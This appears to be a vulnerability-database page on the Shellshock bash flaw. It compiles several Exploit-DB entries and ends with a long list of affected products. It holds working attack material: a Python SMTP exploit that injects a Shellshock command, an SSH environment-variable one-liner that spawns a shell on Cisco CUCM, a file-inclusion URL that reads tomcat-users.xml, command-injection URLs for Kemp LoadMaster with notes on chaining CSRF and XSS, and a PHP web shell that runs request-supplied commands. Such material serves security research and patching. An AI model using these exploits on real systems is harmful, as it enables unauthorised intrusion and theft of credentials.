detected') s.send(b'HELO x\r\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8')) s.recv(1024) s.send(b'DATA\r\n') s.recv(1024) s.send(b'\r\nxxx\r\n.\r\n') s.recv(1024) s.send(b'QUIT\r\n') s.recv(1024) print('[*] Done')
Exploit Database EDB-ID : 37816

Date de publication : 2015-08-17 22h00 +00:00
Auteur : Bernhard Mueller
EDB Vérifié : No

Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: http://www.cisco.com/ Versions affected: <9.2, <10.5.2, <11.0.1. Severity: Low to medium Vendor notified: Yes Reported: Oct. 2014 Public release: Aug. 13th, 2015 Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> Summary: -------- Cisco Unified Communications Manager (CUCM) offers services such as session management, voice, video, messaging, mobility, and web conferencing. During the last year, Vantage Point Security has reported four security issues to Cisco as listed below. 1. Shellshock command injection -------------------------------- Authenticated users of CUCM can access limited functionality via the web interface and Cisco console (SSH on port 22). Because the SSH server is configured to process several environment variables from the client and a vulnerable version of bash is used, it is possible to exploit command injection via specially crafted environment variables (CVE-2014-6271 a.k.a. shellshock). This allows an attacker to spawn a shell running as the user "admin". Several environment variables can be used to exploit the issue. Example: $ LC_PAPER="() { x;};/bin/sh" ssh Administrator@examplecucm.com 2. Local File Inclusion ----------------------- The application allows users to view the contents of any locally accessible files on the web server through a vulnerability known as LFI (Local File Inclusion). LFI vulnerabilities are commonly used to download application source code, configuration files and files containing sensitive information such as passwords. Exploiting this issue requires a valid user account. https://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml 3. Unauthenticated access to ping command ----------------------------------------- The pingExecute servlet allows unauthenticated users to execute pings to arbitrary IP addresses. This could be used by an attacker to enumerate the internal network. The following URL triggers a ping of the host 10.0.0.1: https://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false 4. Magic session ID allows unauthenticated access to SOAP calls --------------------------------------------------------------- Authentication for some methods in the EPAS SOAP interface can be bypassed by using a hardcoded session ID. The methods "GetUserLoginInfoHandler" and "GetLoggedinXMPPUserHandler" are affected. Fix Information: ---------------- Upgrade to CUCM version 9.2, 10.5.2 or 11.0.1. References: ----------- https://tools.cisco.com/quickview/bug/CSCus88031 https://tools.cisco.com/quickview/bug/CSCur49414 https://tools.cisco.com/quickview/bug/CSCum05290 http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash http://tools.cisco.com/security/center/viewAlert.x?alertId=37111 Timeline: --------- 2014/10: Issues reported to Cisco; 2015/07: Confirm that all issues have been fixed. About Vantage Point Security: -------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg
Exploit Database EDB-ID : 36609

Date de publication : 2015-04-01 22h00 +00:00
Auteur : Roberto Suggi Liverani
EDB Vérifié : No

# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: http://kemptechnologies.com/load-balancer/ # Version: 7.1.16 and previous versions # Tested on: Kemp Load Master 7.1-16 # CVE : CVE-2014-5287/5288 Link: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks. The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later). Change logs of the fixed issues can be found at the following page: "PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288". Remote Code Execution - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288 An interesting remote code execution vector can be found through the attack payload below: http://x.x.x.x/progs/fwaccess/add/1|command The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests. We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called. On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information: http://x.x.x.x/progs/fwaccess/add/1'ls Response: HTTP/1.1 200 OK Date: Sat, 27 Dec 2014 23:25:55 GMT Server: mini-http/1.0 (unix) Connection: close Content-Type: text/html /usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `'' /usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator. By attempting the request below, it is possible to achieve code execution: http://x.x.x.x/progs/fwaccess/add/1|ls Response: Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command. The application is flawed in so many other points, also, via HTTP POST requests Other injection points that were found: Page: /progs/geoctrl/doadd Method: POST Parameter: fqdn Page: /progs/networks/hostname Method: POST Parameter: host Page: /progs/networks/servadd Method: POST Parameter: addr Page: /progs/useradmin/setopts Method: POST Parameter: xuser So how can we exploit all this goodness? CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014 We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request. Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request. Reflected and Stored XSS - status: partially fixed - reported on June 2014 Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> BeEF just to achieve persistence. Reflected XSS was found on this point: Page: /progs/useradmin/setopts Method: POST Parameter: xuser Stored XSS was found on the following points: Page: /progs/geoctrl/doadd Method: POST Parameter: fqdn A further injection points: Page: /progs/fwaccess/add/0 Method: POST Parameter: comment Page: /progs/doconfig/setmotd Method: POST Parameter: BeEF Module As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance. The github pull request for the module can be found here: https://github.com/beefproject/beef/pull/1104/files For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and @antisnatchor was very quick to fix it in this case. So if you want to try it, ensure you have the latest version of BeEF installed. Extra - bonus Denial of Service - status: unknown - reported on June 2014 It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master. Shell-shock - status: unknown - reported in 2015 Obviously, the application is not immune from the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment has been removed shortly after). For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well. Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-) If you are keen for an extra-extra bonus, keep reading... Extra - extra bonus: No license, no web authentication However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-)
Exploit Database EDB-ID : 35146

Date de publication : 2014-11-02 23h00 +00:00
Auteur : Ryan King (Starfall)
EDB Vérifié : No

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <pre> <?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?> <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variables whose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variables that // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, // PHP will let the user modify ANY environment variable! mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail } else return "Not vuln (not bash)"; $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>

Products Mentioned

Configuraton 0

Gnu>>Bash >> Version To (including) 4.3

Configuraton 0

Arista>>Eos >> Version From (including) 4.9.0 To (excluding) 4.9.12

Arista>>Eos >> Version From (including) 4.10.0 To (excluding) 4.10.9

Arista>>Eos >> Version From (including) 4.11.0 To (excluding) 4.11.11

Arista>>Eos >> Version From (including) 4.12.0 To (excluding) 4.12.9

Arista>>Eos >> Version From (including) 4.13.0 To (excluding) 4.13.9

Arista>>Eos >> Version From (including) 4.14.0 To (excluding) 4.14.4f

Configuraton 0

Oracle>>Linux >> Version 4

Oracle>>Linux >> Version 5

Oracle>>Linux >> Version 6

Configuraton 0

Qnap>>Qts >> Version To (excluding) 4.1.1

Qnap>>Qts >> Version 4.1.1

Qnap>>Qts >> Version 4.1.1

Configuraton 0

Mageia>>Mageia >> Version 3.0

Mageia>>Mageia >> Version 4.0

Configuraton 0

Redhat>>Gluster_storage_server_for_on-premise >> Version 2.1

    Redhat>>Virtualization >> Version 3.4

      Redhat>>Enterprise_linux >> Version 4.0

      Redhat>>Enterprise_linux >> Version 5.0

      Redhat>>Enterprise_linux >> Version 6.0

      Redhat>>Enterprise_linux >> Version 7.0

      Redhat>>Enterprise_linux_desktop >> Version 5.0

      Redhat>>Enterprise_linux_desktop >> Version 6.0

      Redhat>>Enterprise_linux_desktop >> Version 7.0

      Redhat>>Enterprise_linux_eus >> Version 5.9

      Redhat>>Enterprise_linux_eus >> Version 6.4

      Redhat>>Enterprise_linux_eus >> Version 6.5

      Redhat>>Enterprise_linux_eus >> Version 7.3

      Redhat>>Enterprise_linux_eus >> Version 7.4

      Redhat>>Enterprise_linux_eus >> Version 7.5

      Redhat>>Enterprise_linux_eus >> Version 7.6

      Redhat>>Enterprise_linux_eus >> Version 7.7

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 5.9_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 6.4_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 6.5_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.3_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.4_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.5_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.6_s390x

      Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.7_s390x

      Redhat>>Enterprise_linux_for_power_big_endian >> Version 5.0_ppc

      Redhat>>Enterprise_linux_for_power_big_endian >> Version 5.9_ppc

      Redhat>>Enterprise_linux_for_power_big_endian >> Version 6.0_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian >> Version 6.4_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian >> Version 7.0_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 6.5_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.3_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.4_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.5_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.6_ppc64

      Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.7_ppc64

      Redhat>>Enterprise_linux_for_scientific_computing >> Version 6.0

      Redhat>>Enterprise_linux_for_scientific_computing >> Version 7.0

      Redhat>>Enterprise_linux_server >> Version 5.0

      Redhat>>Enterprise_linux_server >> Version 6.0

      Redhat>>Enterprise_linux_server >> Version 7.0

      Redhat>>Enterprise_linux_server_aus >> Version 5.6

      Redhat>>Enterprise_linux_server_aus >> Version 5.9

      Redhat>>Enterprise_linux_server_aus >> Version 6.2

      Redhat>>Enterprise_linux_server_aus >> Version 6.4

      Redhat>>Enterprise_linux_server_aus >> Version 6.5

      Redhat>>Enterprise_linux_server_aus >> Version 7.3

      Redhat>>Enterprise_linux_server_aus >> Version 7.4

      Redhat>>Enterprise_linux_server_aus >> Version 7.6

      Redhat>>Enterprise_linux_server_aus >> Version 7.7

      Redhat>>Enterprise_linux_server_from_rhui >> Version 5.0

      Redhat>>Enterprise_linux_server_from_rhui >> Version 6.0

      Redhat>>Enterprise_linux_server_from_rhui >> Version 7.0

      Redhat>>Enterprise_linux_server_tus >> Version 6.5

      Redhat>>Enterprise_linux_server_tus >> Version 7.3

      Redhat>>Enterprise_linux_server_tus >> Version 7.6

      Redhat>>Enterprise_linux_server_tus >> Version 7.7

      Redhat>>Enterprise_linux_workstation >> Version 5.0

      Redhat>>Enterprise_linux_workstation >> Version 6.0

      Redhat>>Enterprise_linux_workstation >> Version 7.0

      Configuraton 0

      Suse>>Studio_onsite >> Version 1.3

      Opensuse>>Opensuse >> Version 12.3

      Opensuse>>Opensuse >> Version 13.1

      Opensuse>>Opensuse >> Version 13.2

      Suse>>Linux_enterprise_desktop >> Version 11

      Suse>>Linux_enterprise_desktop >> Version 12

      Suse>>Linux_enterprise_server >> Version 10

      Suse>>Linux_enterprise_server >> Version 10

      Suse>>Linux_enterprise_server >> Version 11

      Suse>>Linux_enterprise_server >> Version 11

      Suse>>Linux_enterprise_server >> Version 11

      Suse>>Linux_enterprise_server >> Version 11

      Suse>>Linux_enterprise_server >> Version 12

      Suse>>Linux_enterprise_software_development_kit >> Version 11

      Suse>>Linux_enterprise_software_development_kit >> Version 12

      Configuraton 0

      Debian>>Debian_linux >> Version 7.0

      Configuraton 0

      Ibm>>Infosphere_guardium_database_activity_monitoring >> Version 8.2

        Ibm>>Infosphere_guardium_database_activity_monitoring >> Version 9.0

          Ibm>>Infosphere_guardium_database_activity_monitoring >> Version 9.1

            Ibm>>Pureapplication_system >> Version From (including) 1.0.0.0 To (including) 1.0.0.4

            Ibm>>Pureapplication_system >> Version From (including) 1.1.0.0 To (including) 1.1.0.4

            Ibm>>Pureapplication_system >> Version 2.0.0.0

            Ibm>>Qradar_risk_manager >> Version 7.1.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.1.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.0

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.1

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.2

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.3

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.3

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.3

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.3

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.3

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.4

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.5

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.6

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.7

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.7

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.7

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.7

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.7

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.8.15

            Ibm>>Qradar_security_information_and_event_manager >> Version 7.2.9

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.0

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.1

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.2

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.3

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.4

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.6

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Qradar_vulnerability_manager >> Version 7.2.8

            Ibm>>Smartcloud_entry_appliance >> Version 2.3.0

              Ibm>>Smartcloud_entry_appliance >> Version 2.4.0

                Ibm>>Smartcloud_entry_appliance >> Version 3.1.0

                  Ibm>>Smartcloud_entry_appliance >> Version 3.2.0

                    Ibm>>Smartcloud_provisioning >> Version 2.1.0

                    Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1

                      Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1

                        Ibm>>Software_defined_network_for_virtual_environments >> Version To (excluding) 1.2.1

                          Ibm>>Starter_kit_for_cloud >> Version 2.2.0

                            Ibm>>Workload_deployer >> Version From (including) 3.1.0 To (including) 3.1.0.7

                            Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.1

                            Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.2

                            Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.3

                            Ibm>>Security_access_manager_for_mobile_8.0_firmware >> Version 8.0.0.5

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.1

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.2

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.3

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.4

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.5

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.6

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.7

                            Ibm>>Security_access_manager_for_web_7.0_firmware >> Version 7.0.0.8

                            Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.2

                            Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.3

                            Ibm>>Security_access_manager_for_web_8.0_firmware >> Version 8.0.0.5

                            Configuraton 0

                            Ibm>>Storwize_v7000_firmware >> Version From (including) 1.1.0.0 To (excluding) 1.4.3.5

                              Ibm>>Storwize_v7000_firmware >> Version From (including) 1.5.0.0 To (excluding) 1.5.0.4

                                Ibm>>Storwize_v7000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                Ibm>>Storwize_v7000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                Ibm>>Storwize_v7000 >> Version -

                                Configuraton 0

                                Ibm>>Storwize_v5000_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11

                                Ibm>>Storwize_v5000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                Ibm>>Storwize_v5000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                Ibm>>Storwize_v5000 >> Version -

                                Configuraton 0

                                Ibm>>Storwize_v3700_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11

                                Ibm>>Storwize_v3700_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                Ibm>>Storwize_v3700_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                Ibm>>Storwize_v3700 >> Version -

                                Configuraton 0

                                Ibm>>Storwize_v3500_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11

                                Ibm>>Storwize_v3500_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                Ibm>>Storwize_v3500_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                Ibm>>Storwize_v3500 >> Version -

                                Configuraton 0

                                Ibm>>Flex_system_v7000_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11

                                  Ibm>>Flex_system_v7000_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                  Ibm>>Flex_system_v7000_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                    Ibm>>Flex_system_v7000 >> Version -

                                    Configuraton 0

                                    Ibm>>San_volume_controller_firmware >> Version From (including) 1.1.0.0 To (excluding) 7.1.0.11

                                    Ibm>>San_volume_controller_firmware >> Version From (including) 7.2.0.0 To (excluding) 7.2.0.9

                                    Ibm>>San_volume_controller_firmware >> Version From (including) 7.3.0.0 To (excluding) 7.3.0.7

                                    Ibm>>San_volume_controller >> Version -

                                    Configuraton 0

                                    Ibm>>Stn6500_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07

                                    Ibm>>Stn6500_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08

                                    Ibm>>Stn6500_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06

                                    Ibm>>Stn6500 >> Version -

                                      Configuraton 0

                                      Ibm>>Stn6800_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07

                                      Ibm>>Stn6800_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08

                                      Ibm>>Stn6800_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06

                                      Ibm>>Stn6800 >> Version -

                                        Configuraton 0

                                        Ibm>>Stn7800_firmware >> Version From (including) 3.8.0.0 To (excluding) 3.8.0.07

                                          Ibm>>Stn7800_firmware >> Version From (including) 3.9.1.0 To (excluding) 3.9.1.08

                                            Ibm>>Stn7800_firmware >> Version From (including) 4.1.2.0 To (excluding) 4.1.2.06

                                              Ibm>>Stn7800 >> Version -

                                                Configuraton 0

                                                Canonical>>Ubuntu_linux >> Version 10.04

                                                Canonical>>Ubuntu_linux >> Version 12.04

                                                Canonical>>Ubuntu_linux >> Version 14.04

                                                Configuraton 0

                                                Novell>>Zenworks_configuration_management >> Version 10.3

                                                Novell>>Zenworks_configuration_management >> Version 11

                                                Novell>>Zenworks_configuration_management >> Version 11.1

                                                  Novell>>Zenworks_configuration_management >> Version 11.2

                                                  Novell>>Zenworks_configuration_management >> Version 11.3.0

                                                  Novell>>Open_enterprise_server >> Version 2.0

                                                    Novell>>Open_enterprise_server >> Version 11.0

                                                    Configuraton 0

                                                    Checkpoint>>Security_gateway >> Version To (excluding) r77.30

                                                    Configuraton 0

                                                    F5>>Big-ip_access_policy_manager >> Version From (including) 10.1.0 To (including) 10.2.4

                                                    F5>>Big-ip_access_policy_manager >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_access_policy_manager >> Version 11.6.0

                                                    F5>>Big-ip_advanced_firewall_manager >> Version From (including) 11.3.0 To (including) 11.5.1

                                                    F5>>Big-ip_advanced_firewall_manager >> Version 11.6.0

                                                    F5>>Big-ip_analytics >> Version From (including) 11.0.0 To (including) 11.5.1

                                                    F5>>Big-ip_analytics >> Version 11.6.0

                                                    F5>>Big-ip_application_acceleration_manager >> Version From (including) 11.4.0 To (including) 11.5.1

